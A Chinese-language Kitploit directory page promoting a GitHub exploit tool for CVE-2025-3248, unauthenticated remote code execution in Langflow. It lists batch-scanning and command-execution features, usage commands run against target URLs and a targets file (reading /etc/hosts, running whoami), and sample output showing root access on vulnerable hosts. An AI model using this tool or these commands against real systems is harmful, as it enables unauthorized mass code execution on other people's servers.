Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/imbas007/cve-2025-3248
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubimbas007/cve-2025-3248

CVE-2025-3248

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Langflow CVE-2025-3248 漏洞利用

一个基于 Python 的 CVE-2025-3248 漏洞利用工具,该漏洞允许远程未认证的攻击者通过精心构造的 HTTP 请求在存在漏洞的 Langflow 实例上执行任意代码。

功能

  • 支持单 URL 或从文件批量扫描
  • 自动漏洞检测
  • 命令执行能力
  • 带有时间信息的详细输出
  • 结果分别保存到存在漏洞和不存在漏洞目标的单独文件中
  • 扫描性能的基准测试统计信息

用法

单个 URL 扫描

root@kitploit:~
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"

从文件批量扫描

root@kitploit:~
python CVE-2025-3248.py -f targets.txt

自定义命令执行

root@kitploit:~
python CVE-2025-3248.py -f targets.txt -c "whoami"

示例输出

root@kitploit:~
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp

来源:https://github.com/verylazytech

下载工具